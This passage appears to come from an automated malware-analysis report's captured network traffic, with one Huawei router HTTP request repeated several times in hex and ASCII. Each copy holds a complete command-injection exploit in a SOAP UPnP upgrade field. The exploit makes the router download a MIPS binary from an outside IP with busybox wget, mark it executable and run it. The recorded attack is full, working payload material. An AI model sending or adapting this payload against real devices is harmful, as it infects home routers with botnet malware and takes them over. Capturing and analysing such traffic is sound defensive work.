6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" 